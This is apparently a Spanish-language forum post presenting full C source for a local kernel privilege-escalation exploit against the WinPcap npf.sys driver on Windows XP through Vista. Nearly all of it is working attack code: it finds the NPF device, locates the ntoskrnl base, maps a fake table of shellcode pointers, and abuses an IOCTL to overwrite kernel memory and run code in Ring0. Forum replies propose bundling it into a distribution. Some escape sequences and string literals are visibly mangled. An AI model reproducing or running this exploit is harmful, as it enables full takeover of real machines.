Este exploit ha estado a la venta por 600 € desde el 24 de Abril del 2007.
El fallo está en el driver npf.sys de las librerias de captura de paquetes WinPcap. Está probado y testeado con WinPcap 3.1 y la beta 4.1 Funciona con Windows XP+SP2, 2000 server y workstation, Windows 2003 Server y Windows Vista. Si utilizas RunAs para ejecutar Wireshark por ejemplo, y no descargas manualmente el driver tras utilizarlo; con este exploit puedes cargar y ejecutar código en Ring0. Por lo tanto, tu código se ejecuta en Kernel Mode.
/*Vulnerability discovered by:
Mario Ballano Bárcena, mballano[_at_]gmail.com
http://www.48bits.com/
24, April 2007
*/
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
#define IOCTL_BIOCGSTATS 9031
#define OUT_SIZE 0x10
#define NDRIVERS_LIST 100
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
#define WXP_DELTA 0xA67FF; // SP2 Fully patched!!
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
LPBYTE g_WXP_PATCH_BYTES = "x80x83xffx2Cx75x2Fx53xE8xE1xA2xF7xFFx89x45xDCx85";
LPBYTE g_W2K_PATCH_BYTES = "xCCxCCxCC";
LPBYTE g_W2K3_PATCH_BYTES = "xCCxCCxCC";
LPBYTE g_WVISTA_PATCH_BYTES = "xCCxCCxCC";
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
char *lpBaseName,
DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
BOOL GetNpfDevice (char *lpNpfDevice)
{
DWORD cb,lpType;
char *lpList,*tmp;
HKEY hkey;
BOOL bRes = FALSE;
lpList = malloc(0x1000);
memset(lpList,0,0x1000);
cb = 0x1000;
if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\EAPOL\Parameters\General",0,KEY_READ,&hkey) == ERROR_SUCCESS )
{
printf("AQUI");
if ( RegQueryValueExA( hkey,
"InterfaceList",
0,
&lpType,
lpList,
&cb) == ERROR_SUCCESS )
{
strcpy(lpNpfDevice,"\\.\NPF_");
while(*lpList && *lpList !=''{'') lpList++;
tmp = lpList;
while(*lpList && *(lpList) != ''}'') lpList ++;
*(++lpList) = ''�'';
strcat(lpNpfDevice,tmp);
bRes = TRUE;
}
}
free(lpList);
if (!bRes)
{
printf("Cannot generate NPF Device Name :-(
");
}
return bRes;
}
LPVOID GetNtosBase (VOID)
{
HANDLE hLib;
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
DWORD lpcbNeeded,i;
LPVOID NtosBase = NULL;
LPVOID *lpImageBases = NULL;
char lpBaseName[MAX_PATH];
if ( ( hLib = LoadLibraryA("psapi.dll")) &&
( pEnumDeviceDrivers = (PENUMDEVICES) GetProcAddress(hLib,"EnumDeviceDrivers") ) &&
( pGetDeviceDriverBaseName = (PGETDEVNAME) GetProcAddress(hLib,"GetDeviceDriverBaseNameA")) )
{
lpImageBases = malloc( sizeof(LPVOID) * NDRIVERS_LIST );
pEnumDeviceDrivers(lpImageBases,sizeof(LPVOID) * NDRIVERS_LIST,&lpcbNeeded);
if ( (lpcbNeeded / sizeof(LPVOID)) > NDRIVERS_LIST)
{
lpImageBases = realloc(lpImageBases,sizeof(LPVOID) * lpcbNeeded);
pEnumDeviceDrivers(lpImageBases,lpcbNeeded,&lpcbNeeded);
}
for (i = 0; i < (lpcbNeeded / sizeof(LPVOID)) ; i++ )
{
if ( pGetDeviceDriverBaseName(lpImageBases[i],lpBaseName,MAX_PATH) )
{
printf ("%s
",lpBaseName);
if (!strcmp(lpBaseName,"ntoskrnl.exe"))
{
NtosBase = lpImageBases[i];
printf("NTOSKRNL Base found at %#p
",NtosBase);
break;
}
}
}
free(lpImageBases);
}
else
{
printf("Cannot Load psapi exports!
");
}
return NtosBase;
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if ( GetVersionExA(&osvi) )
{
if (osvi.dwMajorVersion == 5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval = OS_W2K;
break;
case 1:
retval = OS_WXP;
break;
case 2:
retval = OS_W2K3;
break;
}
}
else if (osvi.dwMajorVersion == 6)
{
retval = OS_VISTA;
}
}
g_dwOsVersion = retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{
DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
printf("System identified as Windows Vista
");
retval = WVISTA_DELTA;
break;
case OS_W2K:
printf("System identified as Windows 2000
");
retval = W2K_DELTA;
break;
case OS_W2K3:
printf("System identified as Windows 2003
");
retval = W2K3_DELTA;
break;
case OS_WXP:
printf("System identified as Windows XP
");
retval = WXP_DELTA;
break;
default:
printf("Unidentified system!
");
}
return retval;
}
__declspec( naked ) void ShellCode (VOID)
{
// Just debug it, to check code execution ;-)
__asm int 3;
// The patch _should_ be done fastly ... that´s why we use global vars...
switch(g_dwOsVersion)
{
case OS_VISTA:
memcpy( g_PatchAddress, g_WVISTA_PATCH_BYTES,0x10);
break;
case OS_W2K:
memcpy( g_PatchAddress, g_W2K_PATCH_BYTES,0x10);
break;
case OS_WXP:
memcpy( g_PatchAddress, g_WXP_PATCH_BYTES,0x10);
break;
case OS_W2K3:
memcpy( g_PatchAddress,g_W2K3_PATCH_BYTES,0x10);
break;
}
// Go out without raising an exception ;-), indeed this is inside a SEH frame but ... wtf! :-)
__asm
{
mov eax, [g_PatchAddress]
inc eax
push eax
ret
}
}
int main(int argc, char **argv)
{
HANDLE hDevice;
LPVOID lpNtosSwitch;
DWORD cb, delta;
DWORD values[4];
LPVOID lpFakeTable;
PQUERYSYSTEM NtQuerySystemInformation;
char szNpfDevice[100];
BYTE QueryBuffer[0x24];
int i;
NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(GetModuleHandleA("NTDLL.DLL"),"NtQuerySystemInformation");
printf ("Searching for a valid Interface ...
");
if ( GetNpfDevice(szNpfDevice) )
{
printf("NPF Device name generated! : %s
",szNpfDevice);
}
else
{
printf("Cannot found any valid Interface!
");
return 0;
}
if ( lpFakeTable = VirtualAlloc((LPVOID)0x570000,
0x20000,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE) )
{
printf("Memory allocated at %p
",lpFakeTable);
for ( i=0; i < ( 0x20000/sizeof(LPVOID) ); i++)
{
* ( (LPVOID *)lpFakeTable + i) = ShellCode;
}
printf("Memory mapping filled! ...
");
}
else
{
printf("Cannot allocate memory!
");
return 0;
}
if ( (hDevice = CreateFileA(szNpfDevice,
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device %s succesfully opened!
", szNpfDevice);
if ( (lpNtosSwitch = GetNtosBase()) && ( delta = GetNtosDelta()) )
{
g_PatchAddress = (LPVOID) ((LPBYTE) lpNtosSwitch + delta );
if ( DeviceIoControl(hDevice,
IOCTL_BIOCGSTATS,
(LPVOID)0,0,
(LPVOID)values,OUT_SIZE,
&cb,
NULL) )
{
printf("First time reading ... bytes returned %#x
",cb);
for (i = 0;i<4;i++)
{
printf ("OutBuffer[i] = %#x
",values[i]);
}
}
printf("Launching exploit ...
Overwritting NTOSKRNL switch at -> %#p
",g_PatchAddress);
if ( DeviceIoControl(hDevice,
IOCTL_BIOCGSTATS,
(LPVOID)0,0,
(LPVOID)g_PatchAddress,OUT_SIZE,
&cb,
NULL) )
{
// Dirty trick ..
NtQuerySystemInformation(0x15,QueryBuffer,sizeof(QueryBuffer), NULL);
// Bye bye god mode!
printf("We are back from ring0!
");
}
}
}
else
{
printf("Error: Cannot open device %s
",szNpfDevice);
}
}
Mostrar Mensajes
Deberíamos incluirlo en WiFiSlax, lo hablamos este finde. 
Que alguien le muestre las estadísticas de sus mensajes!!!)
